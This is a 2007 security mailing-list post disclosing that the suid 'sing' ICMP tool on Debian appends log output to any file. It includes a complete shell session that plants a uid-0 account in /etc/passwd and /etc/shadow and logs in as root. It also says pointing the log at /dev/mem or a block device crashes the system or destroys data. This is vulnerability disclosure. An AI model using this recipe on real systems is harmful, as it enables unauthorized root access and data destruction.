Subject: sing (debian) vunlerability?
From: Milen Rangelov <mrangelov@globul.bg.>
To: [email protected]
Content-Type: text/plain
Date: Mon, 03 Dec 2007 08:32:26 +0000
Message-Id: <1196670746.5175.15.camel@gat3way.globul.bg.>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.3
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 03 Dec 2007 08:32:28.0798 (UTC) FILETIME=[0A3239E0:01C83587]
X-Virus-Scanned: antivirus-gw at tyumen.ru
Hello,
The sing utility (Send Nasty ICMP Garbage) is a ping replacement that
allows sending ICMP packets with spoofed source and custom ICMP
types/codes (http://sourceforge.net/projects/sing).
The debian package provides sing as a suid binary (actually,
the sid distribution asks the user whether he'd like it installed suid,
I'm not 100% sure, but in etch, it installs it suid, anyway, should
check).
The sing program has the "-L" option to log its output into a log file.
Due to lack of file ownership checking, any file could be overwriten
(more precisely - appended) with its log output.
I tried to play with making the output usable for some privileges
escalation purposes, but failed initially (sing escapes some bad input,
ehm).
However, it's still possible for any user to crash the system or destroy
block devices' data (provided that the binary is installed SUID of
course). Exploiting that is trivial, just give /dev/mem or any block
device as a log file.
However, later on, I decided to try it again to gain root privileges
and it occured to be quite trivial.
Here is an example session:
gat3way@gat3way:~$ cat hah
hack:x:0:0:/tmp:/bin/sh
n
gat3way@gat3way:~$ cat hah1
hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::
n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
..
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#
After all, that's not a huge problem, cause quite a few users install
sing AFAIK. But it's a very easily exploited vulnerability OTOH and
leads to a superuser privillege escalation, system crash or destroying
data.
Regards,
Milen Rangelov
P.S sorry if that mail is duplicated, I had some problems with my mail
server and had to resend that mail.